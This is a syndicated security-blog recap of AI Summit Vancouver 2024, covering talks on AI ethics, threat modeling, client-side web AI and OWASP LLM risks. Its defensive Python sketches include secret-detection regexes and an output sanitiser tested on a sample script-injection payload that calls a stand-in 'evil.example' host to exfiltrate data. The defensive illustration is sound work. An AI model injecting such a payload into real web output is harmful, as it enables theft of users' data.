At one point in the not-too-distant past, the most exciting technology being explored around the world was steam power. People found ways to use steam to power almost everything, from boats and trains to sewing machines and musical instruments. The city of Vancouver, BC, Canada, even installed the Gastown Steam Clock, putting steam to a practical, everyday use for people in the area. That same spirit of finding helpful uses for an emerging technology was very much present in Vancouver as over 250 LLM enthusiasts gathered for AI Summit Vancouver 2024.
The beginning of November saw 50 expert speakers give 35 sessions and panel discussions across this 2-day conference. This inaugural event marked Vancouver’s entry into the world of AI summits, highlighting the intersection of technology, ethics, and security. The first-time organizers put on an event where conversations and ideas flowed freely among LLM enthusiasts, entrepreneurs, students, and developers working to deploy AI-enabled applications at their companies.
Here are just a few highlights from this first-of-its-kind event in Vancouver.
AI Summit Vancouver
People are ends unto themselves, not just a means
In his opening keynote, “The Deeper Ethics of AI,” Morten Rand-Hendriksen, Principal Staff Instructor at LinkedIn and a self-described pragmatic futurist, opened the conversation on AI ethics by underscoring a critical perspective: “AI is political.” Inspired by historian Timothy Snyder, he asserted that “life itself is political because people are watching what you do, not just what you say,” meaning that every technological decision reflects and amplifies values, whether we acknowledge it or not.
He shared his observation that every company he talks with believes its competitors are way ahead and are sitting on new tech they are about to release, which forces everyone to move at breakneck speed. He said he is always surprised by the amount of pushback when he shares this point with business leaders: no matter what data you show them, everyone assumes they are the ones behind and about to be crushed in the market. This creates an atmosphere where everyone believes whatever they do is justified by “if we don’t do it, they will.”

Morten outlined four frames to evaluate technology:
- Utility – Who benefits from the technology, and at what cost? We need to ask what the problem is and whose problem it is.
- Responsibility – There is no such thing as value-neutral tech. Developers need to consciously take responsibility for their work’s societal impact and the biases built into their platforms.
- Values – His stance was clear: if something feels ethically wrong, it’s worth re-evaluating, as values define our goals. Treat people as ends in themselves, not merely as means.
- Capabilities – All technology helps someone do something. Morten cautioned us against an unchecked drive for “more AI everywhere.” We should focus on deploying AI intentionally rather than as an omnipresent force.
Morten’s parting advice was straightforward yet profound: “Focus on building a society that values people as ends in themselves, rather than viewing them as means to an end.”
Morten Rand-Hendriksen
Threat modeling for AI means preparing for the risks
Nicholas Muy, CISO at Scrut Automation, presented “Need for AI-native threat modeling practices for security of AI pipelines,” which served as a call to re-imagine security frameworks that can handle the unique vulnerabilities of AI. The first step to this threat modeling approach is defining the risks. Nicholas broke it down into a few basic categories: threats to LLMs, threats from applications using LLMs, and threats to overall security when integrating AI systems. He stressed the role of Data Loss Prevention (DLP) in AI, where machine learning can streamline tasks like regex-based data protection.
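Nicholas’s point about streamlining regex-based data protection can be sketched in a few lines of Python. This is a loose illustration of the idea, not Scrut Automation’s actual tooling: the pattern names and regexes below are simplified assumptions, and a production DLP system would use far more robust, vetted detectors.

```python
import re

# Hypothetical, simplified detectors -- real DLP relies on vetted,
# well-tested patterns and contextual validation, not these sketches.
PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}

def redact(text: str) -> str:
    """Replace anything matching a known pattern before the text
    crosses a trust boundary, e.g. before it is sent to an LLM."""
    for name, pattern in PATTERNS.items():
        text = pattern.sub(f"[REDACTED:{name}]", text)
    return text

print(redact("Contact alice@example.com, key AKIAABCDEFGHIJKLMNOP"))
```

The interesting design question, as Nicholas framed it, is not the regexes themselves but where in the pipeline a step like `redact` runs, and which inputs upstream of it are assumed trustworthy.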
Nicholas emphasized a hands-on approach to securing data pipelines, identifying the need for trust validation across various points in the process. He advocated for “pipeline views,” which break down AI processes into manageable sections and help clarify where trust is assumed. In his view, effective threat modeling must incorporate cross-team collaboration, combining insights from development and security teams.
He recommended focusing on understanding which inputs can be trusted and which cannot, treating this as the foundation of all AI-native security frameworks. Nicholas concluded that effective AI threat modeling is not about creating impenetrable walls but understanding and preparing for how interconnected systems can lead to unexpected vulnerabilities.
Nicholas Muy
AI is faster, and safer, when running in the browser
In his presentation “Web AI in 2024: Superpowers for Modern Web Apps,” Jason Mayes, Web AI Lead for Developer Relations Engineering at Google, explained that for many AI applications, the absolute best place to run them is locally, in the browser. This approach eliminates the need for cloud-based solutions, along with the privacy and latency concerns that server-side AI implementations bring. These benefits are especially significant for industries prioritizing data sovereignty and privacy.
Client-side AI preserves user privacy, as data never leaves the local machine. This approach offers offline capabilities and allows services to only retrieve metadata or anonymized data from end users. For example, AI-powered background blurring for video calls requires rapid processing that could add latency if the image needs to be sent over the web first. By blurring locally with client-side AI, that lag is gone. The power of Web AI is already evident in Adobe’s implementation for real-time webcam segmentation, noise cancellation, and even live LLMs running within browsers.
Jason’s vision is that Web AI’s reach will grow as JavaScript-based models are created for diverse applications—from object detection to image recognition and augmented reality. He encouraged us to reimagine what we can do with the web page, highlighting the potential of technologies like VisualBlocks that empower developers with block-based AI model creation.
Jason Mayes
The potential dark side of AI and what to do about it
OWASP Core Team AI Security member and stealth startup Co-Founder Talesh Seeparsan offered a sobering reflection on AI’s potential to enable malicious activity in his talk, “This is How Your AI Is Going to Get You Into Trouble.” He introduced us to the idea of systems impact versus human impact. Systems impacts include technical glitches, bugs, and security issues caused by misconfiguration or lack of protection. Human impacts directly affect people’s lives.
For example, a systems impact event could be discovering you can remotely execute code through an application, while a human impact event could be leaking personal information that leads to blackmail. While both types of events are bad, Talesh implored us to care more about the human side of things when thinking through the likelihood of attacks and what preventative measures we should take.
Fortunately, he and the OWASP team are about to release the new Top 10 for LLM Applications. This latest OWASP guidance on securing AI systems covers risks including prompt injection, model theft, insecure output handling, and failure to protect against disclosure of sensitive information. Talesh underscored the critical need for caution when adopting these new tools, especially in unregulated spaces.
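To make one of those categories concrete, consider insecure output handling: a web app that renders model output as HTML should escape it first and flag anything that looks like active content. The sketch below is my own loose illustration of that principle, not an official OWASP tool; the `SUSPICIOUS` pattern and the blocking message are assumptions for demonstration.

```python
import html
import re

# A crude tripwire for content that looks like an injection attempt.
# Real defenses combine escaping, content security policies, and review.
SUSPICIOUS = re.compile(r"<script|javascript:|onerror\s*=", re.IGNORECASE)

def safe_render(llm_output: str) -> str:
    """Escape model output before embedding it in an HTML page,
    blocking output that appears to contain active content."""
    if SUSPICIOUS.search(llm_output):
        # Route to logging/review rather than silently rendering it.
        llm_output = "[blocked: potentially unsafe model output]"
    return html.escape(llm_output)

print(safe_render("Here is the summary you asked for."))
print(safe_render("<script>fetch('https://evil.example/steal')</script>"))
```

The key habit is treating LLM output as untrusted input, exactly as you would treat data arriving from an anonymous user.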
Talesh Seeparsan
A community discussing AI’s promise and pitfalls
There were a lot of discussions throughout the event about the safety of using AI, especially at scale. Your author was able to give a talk about the hidden dangers of AI. I engaged with multiple developers who are being asked to use AI to speed up their output but, in most cases, have received neither training on the tools nor security awareness training. While the allure of rapid AI advancements is undeniable, the summit underscored the importance of putting ethical and security considerations at the forefront of development.
Another aspect at the center of the panels and discussions was funding AI-driven businesses. Many attendees were entrepreneurs looking for ways to fund their AI-powered startups, which regional agencies and investors are keen to do, as long as the underlying products help solve real problems. Vancouver’s first summit set a thoughtful tone for future AI discussions. The power of AI lies not just in its algorithms but in the values and structures we embed within it.
*** This is a Security Bloggers Network syndicated blog from GitGuardian Blog – Take Control of Your Secrets Security authored by Dwayne McDaniel. Read the original post at: https://blog.gitguardian.com/ai-summit-vancouver-2024/